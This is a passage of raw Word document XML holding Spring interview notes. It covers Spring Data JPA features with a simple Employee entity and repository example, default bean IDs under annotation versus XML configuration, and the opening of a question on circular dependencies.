          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>9. Transaction Management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407F44EC" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1936"/>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Spring Data JPA integrates with Spring’s </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>transaction management</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It automatically handles </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>transactions</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for you when using the @Transactional annotation, ensuring that all database operations are wrapped in a transaction for consistency and rollback support.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D83F576" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>10. Improved Testing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6CA700" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1937"/>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Since Spring Data JPA is tightly integrated with the Spring ecosystem, it benefits from Spring's testing support. You can easily mock repositories, test database interactions, and write unit tests using Spring's test frameworks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354FA403" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>11. Support for Multiple Database Types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B53C80D" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1938"/>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Spring Data JPA supports multiple database types and JPA providers, including </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hibernate</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>EclipseLink</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OpenJPA</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, allowing you to choose the one that best fits your needs while still using the same API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682E8711" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example of Spring Data JPA in Action:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C008A0A" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6F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Entity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBC8CEF" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6F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public class Employee {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B77647F" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6F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Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E573468" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6F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GeneratedValue(strategy = GenerationType.IDENTITY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12822C36" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6F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private Long id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E6D076" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6F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private String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD80539" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4D4B0E" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6F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 Getters and setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39450891" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28666A29" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C03654E" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6F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Repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29526D4E" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6F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lastRenderedPageBreak/>
        <w:t>public interface EmployeeRepository extends JpaRepository&lt;Employee, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A380880" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6F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List&lt;Employee&gt; findByName(String name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AAF510" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63882321" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B88B4B" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6F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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Data JPA</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC4A213" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1939"/>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Simplifying data access and reducing boilerplate code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448A870C" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1939"/>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Automating CRUD operations and query generation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116BB087" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1939"/>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Integrating seamlessly with Spring and Spring Boot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5FE45C" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1939"/>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Supporting pagination, sorting, and custom queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C89BE6" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6FA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1939"/>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Enabling easy entity management and transaction handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2311B7C6" w14:textId="77777777" w:rsidR="00EE6FA6" w:rsidRPr="00C720CE" w:rsidRDefault="00EE6F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It is a powerful tool to improve productivity, simplify persistence logic, and maintain consistency within Spring applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F6D5E2" w14:textId="4B87E2A0" w:rsidR="00AD1E70" w:rsidRPr="00CE4B95"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8C22810">
          <v:rect id="_x0000_i2131" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AA05C4" w14:textId="77777777" w:rsidR="003C1DA6" w:rsidRPr="00CE4B95" w:rsidRDefault="003C1DA6" w:rsidP="003C1DA6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="452" w:name="_Toc196307932"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can we have beans without bean id?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="452"/>
    </w:p>
    <w:p w14:paraId="35ABFC8E" w14:textId="77777777" w:rsidR="003C1DA6" w:rsidRPr="00C720CE" w:rsidRDefault="003C1DA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Yes, in Spring, you </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>can have beans without explicitly specifying a bean id</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when using </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>annotations</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like @Component, @Service, @Repository, or @Controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2204B0F3" w14:textId="77777777" w:rsidR="003C1DA6" w:rsidRPr="00C720CE" w:rsidRDefault="00000000" w:rsidP="00C720C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0F4D0F1">
          <v:rect id="_x0000_i2132" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="29051A31" w14:textId="77777777" w:rsidR="003C1DA6" w:rsidRPr="00C720CE" w:rsidRDefault="003C1DA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CAA151" w14:textId="77777777" w:rsidR="003C1DA6" w:rsidRPr="00C720CE" w:rsidRDefault="003C1D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Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9B8042" w14:textId="77777777" w:rsidR="003C1DA6" w:rsidRPr="00C720CE" w:rsidRDefault="003C1D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public class MyService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B944A08" w14:textId="77777777" w:rsidR="003C1DA6" w:rsidRPr="00C720CE" w:rsidRDefault="003C1D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 Bean without explicit ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E8D785" w14:textId="77777777" w:rsidR="003C1DA6" w:rsidRPr="00C720CE" w:rsidRDefault="003C1D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A0CF26" w14:textId="77777777" w:rsidR="003C1DA6" w:rsidRPr="00C720CE" w:rsidRDefault="003C1D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In this case, Spring will automatically assign a default bean ID — typically the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>class name with the first letter in lowercase</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0937C9BD" w14:textId="77777777" w:rsidR="003C1DA6" w:rsidRPr="00C720CE" w:rsidRDefault="003C1DA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>➡️</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bean ID = "myService"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C42FE79" w14:textId="77777777" w:rsidR="003C1DA6" w:rsidRPr="00C720CE" w:rsidRDefault="00000000" w:rsidP="00C720C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B00684C">
          <v:rect id="_x0000_i2133" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7129453D" w14:textId="77777777" w:rsidR="003C1DA6" w:rsidRPr="00C720CE" w:rsidRDefault="003C1DA6" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> When using XML Configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57523AD5" w14:textId="77777777" w:rsidR="003C1DA6" w:rsidRPr="00C720CE" w:rsidRDefault="003C1D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In XML-based configuration, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>you must specify id or name</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A7D905" w14:textId="77777777" w:rsidR="003C1DA6" w:rsidRPr="00C720CE" w:rsidRDefault="003C1D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lt;bean id="myBean" class="com.example.MyService" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3D4DEA" w14:textId="77777777" w:rsidR="003C1DA6" w:rsidRPr="00C720CE" w:rsidRDefault="003C1DA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So, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bean ID is required in XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, but </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>optional when using annotation-based configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Spring auto-generates one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE2CD39" w14:textId="77777777" w:rsidR="003C1DA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="003C1DA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9ADEEAB">
          <v:rect id="_x0000_i2134" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D71D764" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00CE4B95" w:rsidRDefault="00A34736" w:rsidP="00A34736">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="453" w:name="_Toc196307933"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is circular dependency?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="453"/>
    </w:p>
    <w:p w14:paraId="4A8F8F70" w14:textId="040DD8C5" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Circular Dependency</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
